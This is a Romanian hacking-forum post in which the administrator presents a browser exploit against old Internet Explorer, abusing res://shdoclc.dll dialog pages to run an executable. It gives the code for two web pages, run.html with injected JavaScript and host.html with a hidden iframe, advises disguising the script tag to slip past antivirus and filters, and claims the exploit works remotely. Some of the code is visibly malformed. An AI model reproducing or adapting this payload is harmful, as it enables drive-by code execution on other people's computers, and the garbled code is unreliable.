Hacking Romania
Veti fi raspunzatori de utilizarea inregistrarii dumneavoastra, indiferent daca ...
|
Lista Forumurilor Pe Tematici
|
Hacking Romania | Reguli | Inregistrare | Login
POZE HACKING ROMANIA
Nu sunteti logat.
|
Nou pe simpatie: Angelina20 din Cluj
 | Femeie 23 ani Cluj cauta Barbat 24 - 55 ani |
|
admin
Administrator
 Inregistrat: acum 15 ani
Postari: 255
|
|
De unde provin aceste pagini si unde se află??? Hmm nimic mai simplu, astfel de mesaje sau mai bine spus pagini HTML, sunt continute într-o librărie DLL mai precis în SHDOCLC.DLL pe care o puteti găsi în directorul "....\windows\system32" (asta în sistemele windows 2000/XP). La continutul acestui file se poate accesa din browser-ul nostru (normal, unul IIS) prin prefixul "res://" Dacă vreti să faceti cite-un test iată unele dintre adresele ce trebuiesc digitate: res://shdoclc.dll/world.bmp res://shdoclc.dll/ie5.gif si altele pe care nu stau acum să le insir. Dacă intentionati să mergeti să vă uitati la tot ceea ce este continut în librăria DLL vă puteti folosi de programul "EXE.SCOPE";usor de găsit pe Internet. Vă întrebati la ce foloseste toată această prefatză, cu sigurantă unii dintre voi vor să aplice imediat codul si gata, dar cred ca este necesar să se înteleagă functionalitatea reală fără a sări nici-un pasaj care s-ar putea rivela fundamental.
Asadar, unele dintre paginile continute în interiorul acestei librării DLL realizează functiuni de sistem: în câteva cuvinte unele functionalităti in IIS sunt realizate în HTML, lucru care vă va stupi poate dar este asa, nu este vina mea si nici a voastră.
Aceste pagini au posibilitatea să actioneze, chiar dacă în mod foarte usor, asupra sistemului operativ. Acum putem trece la partea efectivă a exploit-ului nostru. Pentru a-l crea este necesar să construim două pagini web si anume:
1) host.html: pagina "oaspete" care contine obiectul <IFRAME>
2) run.html: pagina care contine codul javascript
Cod de introdus pentru a realiza pagina run.html
Code:
<HTML>
<H1>INTERNET EXPLORER RES-DIALOG EXPLOIT</H1>
(RUN.HTML)
<P>[/i]Tentativo di apertura di una finestra di dialogo in corso...</P>
showModalDialog("base.html",dlg_par);
<script>
function oExploit(iSec) {
return {rel:"stylesheet",
readyState:"exploit",
href:injcode
};
}
oExploit.length=1;
var dlg_par={document:{
all:{tags:function (sTag) {
return sTag=="link" ? oExploit : [];
}
}
}
}
var injcode="<scr>\
var o=open(\"res://shdoclc.dll/about.dlg\",\"\",\"height=100,width=100,resizable\";\
setTimeout(function (){\
o.document.body.innerHTML=\"<object></object>\";}\
,2000);\
</scr>"
showModalDialog("host.html",dlg_par);
</script>
</HTML> |
Codul javascript comandă deschiderea ferestrei "oaspete" "host.html" si îi trimite codul exploit-ului care este memorizat în variabila stringa injcode. Codul continut în injcode lansează un file executabil .EXE creând o pagină de tip res://shdoclc.dll/about.dlg care va fi retinută de IIS ca fiind sigură. Vazând particularitatea sintaxei codului care este trimis, iată unele racomandări de care trebuie tinut cont:
1) Sintaxa "<scr\ipt" în loc de "<script" este necesară pentru a evita controalele antivirus-ilor si un eventual filtraj din partea însăsi a IIS-ului care ar putea să-si dea seama de truc;
2) Într-ucât injcode este o variabilă stringa, atunci când va trebui introdus în interiorul său simbolul apostrofului, va trebui folosit \";
3) Pentru a îmbunătăti lectura codului a fost folosit simbolul \ pentru a separa diversele instructiuni ale codului cu reîntoarceri la capăt; în realitate stringa injcode este ca si cum ar fi scrisă toată pe o singură linie
4) Parcursul fishierului ce trebuie executat trebuie să fie: C:/windows/calc.exe si nu C:\windows\calc.exe: recomand acest lucru foarte important si deci, atentie a nu comite erori de acest gen. Ajunsi până la acest punct, pagina a fost realizată, o salvăm si deschidem o alta nouă!
Realizăm codul paginii "oaspete" care este foarte simplu, tinând cont că se foloseste doar de un tag IFRAME care va merge să tzintească la fereastra de dialog "inculpată" adică res://shdoclc/analyze.dlg Codul va fi:
Code:
<html>
(HOST.HTML)
<style>
iframe {
display:none;
}
</style>
<body>
<iframe></iframe>
<h1>Exploit in corso...</h1>
</body>
</html> |
Folosirea unui astfel de exploit este posibilă atât în local cât si în remote!
_______________________________________ We don't destroy computers fast we hack them low
|
|
pus acum 14 ani |
|